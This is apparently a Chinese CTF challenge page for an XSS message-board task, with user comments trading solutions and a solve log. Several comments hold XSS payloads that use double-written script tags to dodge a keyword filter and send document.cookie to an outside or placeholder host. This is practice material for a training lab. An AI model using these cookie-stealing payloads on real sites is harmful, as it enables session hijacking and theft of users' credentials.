留言板1WEB 未解决

分数: 20 金币: 3
题目作者: harry
一  血: 18256197318
一血奖励: 5金币
解  决: 236
提  示: 需要xss平台接收flag
描  述:
flag{}
评论
Vluae 11天前

我是phpstudy+Cpolar实现XSS。

回复 0

我的刀盾 12天前

弄了个ngrok,收不到,http不行说是(~-_-)~

回复 0

暗流安全 2月前

说点什么吧[img]<scsCRiPtript>location.href="http:/xxxx:8888/?flag_cookie="+document.cookie</scsCRiPtript>[/img] 然后可以用公网运行python3 -m http.server 8888 记得点一下那个图片才会有发送

回复 0

小白RM 3月前

三战,最后直接在当前页面执行了 location.href 跳转,并且用双写绕过关键词过滤 使用自建平台<scscriptript>location.href="http://www.iytzx.com/****/?cookie="+document.cookie</scscriptript>成功接收到flag

回复 3

kr2yh 4月前

<scriscriptpt/src=https://xss.report/c/kr2yh></scriscriptpt> 双写加/代替空格 就可以

回复 1

十里故清云 5月前

在线蹲大手子,只能靠自建vps公网ip收吗?? 现在还有xss平台能收吗(我已急哭)

回复 0

qq1002517 6月前

flag{**********}

回复 0

网恋秀牛子被录屏导致自卑 7月前

我用的是xss.report,可以收到,payload很多,界面酷炫,点右边的爬虫图标就能看到详情,cookie里面有flag。 这题是script双写绕过,空格用斜杠代替

回复 0
十里故清云 5月前

用双写绕过和空格了,还是收不到啊...

回复 0

dlgz 1年前

公网上的xss平台没找到http的,自己搭了一个测试的成功了。

回复 0

Kr1smi1e 1年前

题目确实没问题,可以参考:https://blog.csdn.net/weixin_74357882/article/details/149303799?sharetype=blogdetail&sharerId=149303799&sharerefer=PC&sharesource=weixin_74357882&spm=1011.2480.3001.8118

回复 1

WriteUp

image
小蔡

5 金币

评分(4)

解题动态

Star666 攻破了该题 4天前
小石 攻破了该题 6天前
风掠 攻破了该题 8天前
15325870583 攻破了该题 8天前
Vluae 攻破了该题 11天前
afeer123 攻破了该题 13天前
hdcc1 攻破了该题 13天前
zrlht 攻破了该题 16天前
wangjing6715 攻破了该题 18天前
18394165790 攻破了该题 23天前
1781****263 攻破了该题 24天前
炖蛋 攻破了该题 1月前
billy856 攻破了该题 1月前
fi1y 攻破了该题 1月前
店晓贰 攻破了该题 2月前
掘金 攻破了该题 2月前
Junze 攻破了该题 2月前
CTF-大王 攻破了该题 2月前
ws123 攻破了该题 2月前
ccxxxc 攻破了该题 2月前
问题反馈